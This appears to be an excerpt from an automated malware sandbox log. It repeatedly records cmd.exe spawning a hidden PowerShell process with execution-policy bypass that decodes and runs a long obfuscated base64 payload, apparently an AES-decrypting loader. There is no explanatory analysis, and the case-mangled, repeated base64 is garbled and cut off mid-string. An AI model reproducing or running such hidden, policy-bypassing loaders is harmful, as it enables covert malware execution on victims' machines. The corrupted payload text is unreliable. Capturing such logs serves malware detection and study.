olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n